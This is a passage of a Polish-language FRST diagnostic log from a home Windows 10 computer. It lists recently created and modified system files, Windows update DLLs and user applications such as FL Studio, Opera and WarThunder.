2017-04-12 11:11 - 2017-03-28 07:15 - 00937984 _____ (Microsoft Corporation) C:\WINDOWS\system32\MCRecvSrc.dll
2017-04-12 11:11 - 2017-03-28 07:15 - 00539136 _____ (Microsoft Corporation) C:\WINDOWS\system32\PlayToManager.dll
2017-04-12 11:11 - 2017-03-28 07:14 - 00975872 _____ (Microsoft Corporation) C:\WINDOWS\HelpPane.exe
2017-04-12 11:11 - 2017-03-28 07:14 - 00913920 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.dll
2017-04-12 11:11 - 2017-03-28 07:14 - 00800768 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Security.Authentication.Web.Core.dll
2017-04-12 11:11 - 2017-03-28 07:14 - 00089088 _____ (Microsoft Corporation) C:\WINDOWS\system32\asycfilt.dll
2017-04-12 11:11 - 2017-03-28 07:13 - 02095616 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl
2017-04-12 11:11 - 2017-03-28 07:13 - 01040896 _____ (Microsoft Corporation) C:\WINDOWS\system32\NaturalLanguage6.dll
2017-04-12 11:11 - 2017-03-28 07:13 - 00759296 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
2017-04-12 11:11 - 2017-03-28 07:13 - 00650752 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXService.dll
2017-04-12 11:11 - 2017-03-28 07:12 - 02208768 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Graphics.Printing.3D.dll
2017-04-12 11:11 - 2017-03-28 07:12 - 02026496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl
2017-04-12 11:11 - 2017-03-28 07:12 - 01509376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieapfltr.dll
2017-04-12 11:11 - 2017-03-28 07:11 - 01275392 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Bluetooth.dll
2017-04-12 11:11 - 2017-03-28 07:10 - 01783296 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2017-04-12 11:11 - 2017-03-28 07:10 - 01637888 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieapfltr.dll
2017-04-12 11:11 - 2017-03-28 07:10 - 01231872 _____ (Microsoft Corporation) C:\WINDOWS\system32\dosvc.dll
2017-04-12 11:11 - 2017-03-28 07:10 - 00875520 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBroker.dll
2017-04-12 11:11 - 2017-03-28 07:10 - 00774656 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Web.dll
2017-04-12 11:11 - 2017-03-28 07:09 - 01513472 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2017-04-12 11:11 - 2017-03-28 07:09 - 01328640 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Web.Http.dll
2017-04-12 11:11 - 2017-03-28 07:08 - 02895872 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2017-04-12 11:11 - 2017-03-28 07:07 - 00908800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Search.dll
2017-04-12 11:11 - 2017-03-28 07:07 - 00701952 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.Connectivity.dll
2017-04-12 11:11 - 2017-03-28 07:07 - 00122368 _____ (Microsoft Corporation) C:\WINDOWS\system32\FontProvider.dll
2017-04-12 11:11 - 2017-03-28 07:06 - 00924672 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.BackgroundTransfer.dll
2017-04-12 11:11 - 2017-03-28 07:05 - 01633792 _____ (Microsoft Corporation) C:\WINDOWS\system32\quartz.dll
2017-04-12 11:10 - 2017-03-28 07:37 - 22568960 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2017-04-12 11:10 - 2017-03-28 07:27 - 00425984 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadcloudap.dll
2017-04-12 11:10 - 2017-03-28 07:25 - 18364928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2017-04-12 11:10 - 2017-03-28 07:24 - 19416576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2017-04-12 11:10 - 2017-03-28 07:21 - 23681536 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2017-04-12 11:10 - 2017-03-28 07:21 - 01589760 _____ (Microsoft Corporation) C:\WINDOWS\system32\msdtctm.dll
2017-04-12 11:10 - 2017-03-28 07:18 - 12181504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2017-04-12 11:10 - 2017-03-28 07:17 - 13087232 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2017-04-12 11:10 - 2017-03-28 07:14 - 08126976 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2017-04-12 11:10 - 2017-03-28 07:13 - 06045184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2017-04-12 11:10 - 2017-03-28 07:13 - 04474368 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_47.dll
2017-04-12 11:10 - 2017-03-28 07:12 - 05611008 _____ (Microsoft Corporation) C:\WINDOWS\system32\d2d1.dll
2017-04-12 11:10 - 2017-03-28 07:06 - 01121280 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadtb.dll
2017-04-12 11:09 - 2017-03-28 08:36 - 01617760 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
2017-04-12 11:09 - 2017-03-28 08:36 - 01294688 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
2017-04-12 11:09 - 2017-03-28 08:36 - 00565088 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll
2017-04-12 11:09 - 2017-03-28 08:36 - 00343904 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll
2017-04-12 11:09 - 2017-03-28 08:36 - 00142176 _____ (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll
2017-04-12 11:09 - 2017-03-28 08:35 - 00379232 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\atmfd.dll
2017-04-12 11:09 - 2017-03-28 08:20 - 00764392 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreMessaging.dll
2017-04-12 11:09 - 2017-03-28 08:10 - 00178528 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostUser.dll
2017-04-12 11:09 - 2017-03-28 08:10 - 00146776 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostCommon.dll
2017-04-12 11:09 - 2017-03-28 08:09 - 02446704 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml6.dll
2017-04-12 11:09 - 2017-03-28 08:09 - 00682816 _____ (Microsoft Corporation) C:\WINDOWS\system32\wer.dll
2017-04-12 11:09 - 2017-03-28 08:09 - 00624048 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cng.sys
2017-04-12 11:09 - 2017-03-28 08:08 - 01100128 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe
2017-04-12 11:09 - 2017-03-28 08:08 - 00989024 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe
2017-04-12 11:09 - 2017-03-28 08:00 - 01569184 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32full.dll
2017-04-12 11:09 - 2017-03-28 08:00 - 00628552 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe
2017-04-12 11:09 - 2017-03-28 07:58 - 00372440 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.MediaControl.dll
2017-04-12 11:09 - 2017-03-28 07:38 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIRibbonRes.dll
2017-04-12 11:09 - 2017-03-28 07:37 - 00078848 _____ (Microsoft Corporation) C:\WINDOWS\system32\XblAuthManagerProxy.dll
2017-04-12 11:09 - 2017-03-28 07:36 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIRibbonRes.dll
2017-04-12 11:09 - 2017-03-28 07:36 - 00045056 _____ (Adobe Systems) C:\WINDOWS\system32\atmlib.dll
2017-04-12 11:09 - 2017-03-28 07:35 - 00156160 _____ (Microsoft Corporation) C:\WINDOWS\system32\Family.Client.dll
2017-04-12 11:09 - 2017-03-28 07:35 - 00124416 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.System.SystemManagement.dll
2017-04-12 11:09 - 2017-03-28 07:34 - 00259072 _____ (Microsoft Corporation) C:\WINDOWS\system32\Family.SyncEngine.dll
2017-04-12 11:09 - 2017-03-28 07:34 - 00162304 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmcertinst.exe
2017-04-12 11:09 - 2017-03-28 07:34 - 00129536 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_ClosedCaptioning.dll
2017-04-12 11:09 - 2017-03-28 07:34 - 00088064 _____ (Microsoft Corporation) C:\WINDOWS\system32\XblAuthTokenBrokerExt.dll
2017-04-12 11:09 - 2017-03-28 07:33 - 00196096 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDeviceRegistration.dll
2017-04-12 11:09 - 2017-03-28 07:33 - 00193536 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.WiFi.dll
2017-04-12 11:09 - 2017-03-28 07:33 - 00122880 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepositoryClient.dll
2017-04-12 11:09 - 2017-03-28 07:33 - 00101888 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDeviceRegistration.Ngc.dll
2017-04-12 11:09 - 2017-03-28 07:33 - 00082432 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.System.UserDeviceAssociation.dll
2017-04-12 11:09 - 2017-03-28 07:32 - 00368640 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneBackupHandler.dll
2017-04-12 11:09 - 2017-03-28 07:32 - 00186368 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Radios.dll
2017-04-12 11:09 - 2017-03-28 07:31 - 00547840 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Gaming.Input.dll
2017-04-12 11:09 - 2017-03-28 07:31 - 00289792 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeveloperOptionsSettingsHandlers.dll
2017-04-12 11:09 - 2017-03-28 07:31 - 00257024 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudDomainJoinDataModelServer.dll
2017-04-12 11:09 - 2017-03-28 07:30 - 00651264 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.AllJoyn.dll
2017-04-12 11:09 - 2017-03-28 07:30 - 00268800 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserMgrProxy.dll
2017-04-12 11:09 - 2017-03-28 07:30 - 00049664 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBrokerUI.dll
2017-04-12 11:09 - 2017-03-28 07:29 - 00852480 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Import.dll
2017-04-12 11:09 - 2017-03-28 07:29 - 00391168 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleacc.dll
2017-04-12 11:09 - 2017-03-28 07:29 - 00379904 _____ (Microsoft Corporation) C:\WINDOWS\system32\apprepsync.dll
2017-04-12 11:09 - 2017-03-28 07:29 - 00324608 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.LockScreen.dll
2017-04-12 11:09 - 2017-03-28 07:29 - 00267264 _____ (Microsoft Corporation) C:\WINDOWS\system32\vaultcli.dll
2017-04-12 11:09 - 2017-03-28 07:29 - 00206336 _____ (Microsoft Corporation) C:\WINDOWS\system32\psmsrv.dll
2017-04-12 11:09 - 2017-03-28 07:29 - 00147456 _____ (Microsoft Corporation) C:\WINDOWS\system32\winsrv.dll
2017-04-12 11:09 - 2017-03-28 07:29 - 00146432 _____ (Microsoft Corporation) C:\WINDOWS\system32\AuthBroker.dll
2017-04-12 11:09 - 2017-03-28 07:28 - 00407552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Management.dll
2017-04-12 11:09 - 2017-03-28 07:28 - 00176128 _____ (Microsoft Corporation) C:\WINDOWS\system32\apprepapi.dll
2017-04-12 11:09 - 2017-03-28 07:27 - 01060352 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppContracts.dll
2017-04-12 11:09 - 2017-03-28 07:27 - 00645120 _____ (Microsoft Corporation) C:\WINDOWS\system32\qedit.dll
2017-04-12 11:09 - 2017-03-28 07:27 - 00091136 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatepolicy.dll
2017-04-12 11:09 - 2017-03-28 07:26 - 00329728 _____ (Microsoft Corporation) C:\WINDOWS\system32\deviceaccess.dll
2017-04-12 11:09 - 2017-03-28 07:25 - 01010176 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterprisecsps.dll
2017-04-12 11:09 - 2017-03-28 07:25 - 00966144 _____ (Microsoft Corporation) C:\WINDOWS\system32\sbe.dll
2017-04-12 11:09 - 2017-03-28 07:25 - 00896512 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.AccountsControl.dll
2017-04-12 11:09 - 2017-03-28 07:25 - 00775168 _____ (Microsoft Corporation) C:\WINDOWS\system32\GamePanel.exe
2017-04-12 11:09 - 2017-03-28 07:24 - 00410112 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentClient.dll
2017-04-12 11:09 - 2017-03-28 07:23 - 00073728 _____ (Microsoft Corporation) C:\WINDOWS\system32\WSManMigrationPlugin.dll
2017-04-12 11:09 - 2017-03-28 07:19 - 00295424 _____ (Microsoft Corporation) C:\WINDOWS\system32\dlnashext.dll
2017-04-12 11:09 - 2017-03-28 07:16 - 00167936 _____ (Microsoft Corporation) C:\WINDOWS\system32\ErrorDetails.dll
2017-04-12 11:09 - 2017-03-28 07:16 - 00061952 _____ (Microsoft Corporation) C:\WINDOWS\system32\vss_ps.dll
2017-04-12 11:09 - 2017-03-28 07:15 - 00139776 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Devices.dll
2017-04-12 11:09 - 2017-03-28 07:14 - 01643008 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Speech.dll
2017-04-12 11:09 - 2017-03-28 07:14 - 00869888 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll
2017-04-12 11:09 - 2017-03-28 07:13 - 01359872 _____ (Microsoft Corporation) C:\WINDOWS\system32\SharedStartModel.dll
2017-04-12 11:09 - 2017-03-28 07:13 - 00460800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Midi.dll
2017-04-12 11:09 - 2017-03-28 07:12 - 00376832 _____ (Microsoft Corporation) C:\WINDOWS\system32\CryptoWinRT.dll
2017-04-12 11:09 - 2017-03-28 07:11 - 02914816 _____ (Microsoft Corporation) C:\WINDOWS\system32\CertEnroll.dll
2017-04-12 11:09 - 2017-03-28 07:10 - 01586176 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Globalization.dll
2017-04-12 11:09 - 2017-03-28 07:09 - 01064448 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncCore.dll
2017-04-12 11:09 - 2017-03-28 07:09 - 00716800 _____ (Microsoft Corporation) C:\WINDOWS\system32\ShareHost.dll
2017-04-12 11:09 - 2017-03-28 07:08 - 00180224 _____ (Microsoft Corporation) C:\WINDOWS\system32\enrollmentapi.dll
2017-04-12 11:09 - 2017-03-16 06:47 - 00038768 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompPkgSup.dll
2017-04-12 11:08 - 2017-03-28 08:08 - 01267504 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinTypes.dll
2017-04-12 11:08 - 2017-03-28 08:04 - 01600632 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppobjs.dll
2017-04-12 11:08 - 2017-03-28 07:44 - 07216640 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
2017-04-12 11:08 - 2017-03-28 07:23 - 09130496 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2017-04-12 11:08 - 2017-03-28 07:17 - 05114368 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdp.dll
2017-04-12 11:08 - 2017-03-28 07:17 - 04749312 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll
2017-04-12 11:08 - 2017-03-28 07:14 - 01692160 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
2017-04-12 11:08 - 2017-03-28 07:10 - 02316288 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2017-04-12 11:08 - 2017-03-28 07:08 - 03612672 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2017-04-12 11:08 - 2017-03-28 07:08 - 03542016 _____ (Microsoft Corporation) C:\WINDOWS\system32\actxprxy.dll
2017-04-12 11:08 - 2017-03-18 18:50 - 00956416 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll
2017-04-12 11:08 - 2017-03-18 18:35 - 02278400 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2017-04-10 20:07 - 2017-04-13 14:56 - 00003664 _____ C:\WINDOWS\System32\Tasks\PowerWord-SCT-JT
2017-04-09 13:49 - 2015-07-09 03:11 - 699688757 _____ C:\Users\Emil\Desktop\Wesele Malwiny i Emila.mp4
2017-04-09 01:32 - 2017-04-09 01:32 - 02146080 _____ C:\Users\Emil\Desktop\bITH 09.04.17.flp
2017-04-09 00:25 - 2017-04-09 00:25 - 00001553 _____ C:\Users\Emil\Desktop\FL Studio 12.lnk
2017-04-09 00:25 - 2017-04-09 00:25 - 00000000 ____D C:\VstPlugins
2017-04-09 00:16 - 2017-04-09 00:16 - 00000000 ____D C:\sylenthhh
2017-04-09 00:16 - 2017-04-09 00:16 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sylenth1
2017-04-09 00:14 - 2017-04-09 00:14 - 00000000 ____D C:\Users\Emil\Downloads\Lennar_Digital_Sylenth1_V2.2.1_Windows_8_Fix_130_Presets
2017-04-09 00:12 - 2017-04-09 00:25 - 00000000 ____D C:\FL Studio 12.4.2
2017-04-08 23:56 - 2017-04-08 23:57 - 00000000 ____D C:\Users\Emil\AppData\Local\Runefall
2017-04-08 23:53 - 2017-04-08 23:53 - 00000000 ____D C:\Users\Emil\AppData\Roaming\ZOG
2017-04-07 21:44 - 2017-04-07 21:44 - 00004244 _____ C:\WINDOWS\System32\Tasks\Opera scheduled Autoupdate 1491594233
2017-04-07 21:44 - 2017-04-07 21:44 - 00000000 ____D C:\Users\Emil\AppData\Roaming\Opera Software
2017-04-07 21:44 - 2017-04-07 21:44 - 00000000 ____D C:\Users\Emil\AppData\Local\Opera Software
2017-04-07 21:44 - 2017-04-07 21:43 - 00001353 _____ C:\Users\Emil\Desktop\Opera.lnk
2017-04-07 21:44 - 2017-04-07 21:43 - 00001353 _____ C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Opera.lnk
2017-04-07 21:43 - 2017-04-11 23:30 - 00000000 ____D C:\ProgramData\AVAST Software
2017-04-07 21:42 - 2017-04-17 15:32 - 00002246 _____ C:\Users\Emil\Desktop\WarThunder.lnk
2017-04-07 21:42 - 2017-04-09 21:43 - 00000000 ____D C:\Users\Emil\AppData\Roaming\WarThunder
2017-04-07 21:42 - 2017-04-07 21:42 - 00000000 ____D C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WarThunder
2017-04-02 23:15 - 2017-04-02 23:15 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee Security Scan Plus
2017-04-02 08:15 - 2017-04-02 08:15 - 00087904 _____ (Microsoft Corporation) C:\WINDOWS\system32\UNPUXWorker.exe
2017-03-30 10:15 - 2017-03-30 10:15 - 08072454 _____ C:\Users\Emil\Downloads\1140221_UVA0bgXyghxVJudRzuqAcEXz.pdf
2017-03-29 12:39 - 2017-03-29 12:39 - 00000000 ____D C:\Users\Emil\Downloads\Energy 2000 Mix Vol. 5 - Katowice Edition 2017
2017-03-23 00:29 - 2017-03-28 02:46 - 01110594 _____ C:\Users\Emil\Desktop\bitch new.flp
2017-03-21 21:28 - 2017-04-19 18:37 - 00000000 ____D C:\Users\Emil\AppData\Roaming\OpenFM
2017-03-21 21:28 - 2017-04-19 18:37 - 00000000 ____D C:\Users\Emil\AppData\Local\OpenFM
2017-03-21 21:28 - 2017-04-19 17:48 - 00001258 _____ C:\Users\Emil\Desktop\OpenFM.lnk
2017-03-21 21:28 - 2017-03-21 21:28 - 00001266 _____ C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OpenFM.lnk
2017-03-20 17:25 - 2017-04-19 19:13 - 00002065 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk

==================== Jeden miesiąc - zmodyfikowane pliki i foldery ========

(Załączenie wejścia w fixlist spowoduje przeniesienie pliku/folderu.)

2017-04-19 19:33 - 2016-11-25 17:48 - 00000000 ____D C:\Users\Emil\AppData\Local\CrashDumps
2017-04-19 19:28 - 2017-03-01 12:11 - 00000180 _____ C:\WINDOWS\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat
2017-04-19 19:28 - 2016-11-25 17:27 - 00000000 __SHD C:\Users\Emil\IntelGraphicsProfiles
2017-04-19 19:26 - 2017-03-01 12:13 - 00000000 ____D C:\ProgramData\NVIDIA
2017-04-19 19:26 - 2016-11-21 11:06 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2017-04-19 19:25 - 2016-07-16 08:04 - 00524288 _____ C:\WINDOWS\system32\config\BBI
2017-04-19 19:13 - 2017-02-13 23:32 - 00002462 _____ C:\Users\Emil\Desktop\Mozilla Firefox.lnk
2017-04-19 19:12 - 2016-12-01 00:59 - 00000000 ____D C:\Program Files (x86)\Farm Expert 2017
2017-04-19 18:57 - 2016-11-25 21:19 - 00000000 ____D C:\Users\Emil\AppData\Roaming\DAEMON Tools Lite
2017-04-19 18:44 - 2016-11-25 17:34 - 00000000 ____D C:\Users\Emil\AppData\Roaming\Mozilla
2017-04-19 18:44 - 2016-11-21 11:16 - 02004872 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2017-04-19 18:44 - 2016-11-21 10:34 - 00758682 _____ C:\WINDOWS\system32\perfh015.dat
2017-04-19 18:44 - 2016-11-21 10:34 - 00164054 _____ C:\WINDOWS\system32\perfc015.dat
2017-04-19 18:43 - 2017-03-01 12:20 - 00000000 ____D C:\Users\Emil
2017-04-19 18:43 - 2016-11-25 17:27 - 00000000 ____D C:\Users\Emil\AppData\Local\Packages
2017-04-19 18:41 - 2016-11-25 17:36 - 00000000 ____D C:\Users\Emil\AppData\Local\NVIDIA Corporation
2017-04-19 18:39 - 2016-08-18 09:23 - 00000000 ___HD C:\Intel
2017-04-19 18:38 - 2016-05-05 18:09 - 00000000 ____D C:\Program Files (x86)\McAfee
2017-04-19 18:37 - 2017-03-01 12:05 - 00000000 ___DC C:\WINDOWS\Panther
2017-04-19 18:37 - 2017-02-27 14:58 - 00000000 ____D C:\ProgramData\Adobe
2017-04-19 18:37 - 2017-02-27 14:57 - 00000000 ____D C:\Users\Emil\AppData\Roaming\ScreenShot
2017-04-19 18:37 - 2017-02-03 17:07 - 00000000 ____D C:\Program Files (x86)\My Connection
2017-04-19 18:37 - 2016-12-28 22:01 - 00000000 ____D C:\Users\Emil\AppData\Roaming\GG
2017-04-19 18:37 - 2016-12-28 22:01 - 00000000 ____D C:\Users\Emil\AppData\Local\GG
2017-04-19 18:37 - 2016-11-26 00:03 - 00000000 ____D C:\Users\Emil\AppData\Local\tkdata
2017-04-19 18:37 - 2016-11-25 23:51 - 00000000 ____D C:\Program Files\TrueKey
2017-04-19 18:37 - 2016-11-25 17:41 - 00000000 ____D C:\Users\Emil\AppData\Local\MicrosoftEdge
2017-04-19 18:37 - 2016-11-25 17:27 - 00000000 ____D C:\Users\Emil\AppData\Local\NVIDIA
2017-04-19 18:37 - 2016-08-18 07:52 - 00000000 ____D C:\WINDOWS\NAPP_Dism_Log
2017-04-19 18:37 - 2016-07-16 13:47 - 00000000 __RSD C:\WINDOWS\Media
2017-04-19 18:37 - 2016-07-16 13:47 - 00000000 ___SD C:\WINDOWS\SysWOW64\DiagSvcs
2017-04-19 18:37 - 2016-07-16 13:47 - 00000000 ___SD C:\WINDOWS\SysWOW64\Configuration
2017-04-19 18:37 - 2016-07-16 13:47 - 00000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2017-04-19 18:37 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\SysWOW64\setup
2017-04-19 18:37 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\SysWOW64\MUI
2017-04-19 18:37 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\SysWOW64\Macromed
2017-04-19 18:37 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\SysWOW64\Com
2017-04-19 18:37 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\security
2017-04-19 18:37 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\Registration
2017-04-19 18:37 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\InputMethod
2017-04-19 18:37 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\Help
2017-04-19 18:37 - 2016-07-16 13:47 - 00000000 ____D C:\Program Files\Common Files\microsoft shared
2017-04-19 18:37 - 2016-07-16 13:45 - 00000000 ____D C:\WINDOWS\INF
2017-04-19 18:37 - 2016-05-05 18:53 - 00000000 ___HD C:\OEM
2017-04-19 18:37 - 2016-05-05 18:08 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2017-04-19 18:03 - 2016-11-26 00:02 - 00001243 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\True Key.lnk
2017-04-19 18:03 - 2016-07-16 13:47 - 00000000 ___HD C:\Program Files\WindowsApps
2017-04-19 17:31 - 2016-11-21 02:06 - 00000000 ____D C:\WINDOWS\system32\SleepStudy
2017-04-18 11:10 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\system32\NDF
2017-04-17 15:32 - 2016-05-05 18:08 - 00002077 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2017-04-17 15:30 - 2016-07-16 08:04 - 00032768 _____ C:\WINDOWS\system32\config\ELAM
2017-04-15 23:34 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\rescache
2017-04-12 21:26 - 2016-11-21 11:19 - 00000000 __RHD C:\Users\Public\AccountPictures
2017-04-12 19:09 - 2016-11-21 02:05 - 00337768 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2017-04-12 19:07 - 2016-07-16 13:47 - 00000000 ___SD C:\WINDOWS\SysWOW64\F12
2017-04-12 19:07 - 2016-07-16 13:47 - 00000000 ___SD C:\WINDOWS\system32\F12
2017-04-12 19:07 - 2016-07-16 13:47 - 00000000 ___RD C:\Program Files\Windows Defender
2017-04-12 19:07 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\system32\setup
2017-04-12 19:07 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\system32\appraiser
2017-04-12 19:07 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\ShellExperiences
2017-04-12 19:07 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\Provisioning
2017-04-12 19:07 - 2016-07-16 13:47 - 00000000 ____D C:\Program Files\Windows Photo Viewer
2017-04-12 19:07 - 2016-07-16 13:47 - 00000000 ____D C:\Program Files (x86)\Windows Photo Viewer
2017-04-12 19:07 - 2016-07-16 13:47 - 00000000 ____D C:\Program Files (x86)\Windows Defender
2017-04-12 19:07 - 2016-07-16 08:04 - 00000000 ____D C:\WINDOWS\system32\Dism
2017-04-12 11:37 - 2016-11-25 22:07 - 00000000 ____D C:\WINDOWS\system32\MRT
2017-04-12 11:34 - 2016-11-25 22:07 - 148601744 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2017-04-12 01:04 - 2017-02-19 02:11 - 00000000 ____D C:\Users\Emil\Downloads\Pompa
2017-04-12 01:04 - 2017-02-19 02:09 - 00000000 ____D C:\Users\Emil\Downloads\Pobrane
2017-04-11 23:30 - 2016-05-05 18:09 - 00000000 ____D C:\Program Files\Common Files\AV
2017-04-09 00:25 - 2016-11-26 01:19 - 00001569 _____ C:\Users\Emil\Desktop\FL Studio 12 (64bit).lnk
2017-04-09 00:25 - 2016-11-26 01:07 - 00000000 ____D C:\Program Files (x86)\Image-Line
2017-04-09 00:21 - 2016-11-26 01:18 - 00000000 ____D C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Image-Line
2017-04-09 00:21 - 2016-11-26 01:18 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Image-Line
2017-04-08 23:53 - 2016-05-05 18:08 - 00000000 ____D C:\ProgramData\WildTangent
2017-04-08 23:51 - 2016-11-25 17:43 - 00002412 ____N C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WildTangent Games App - wildgames.lnk
2017-04-08 23:51 - 2016-05-05 18:08 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2017-04-08 23:50 - 2016-05-05 18:08 - 00000000 ____D C:\Program Files (x86)\WildTangent Games
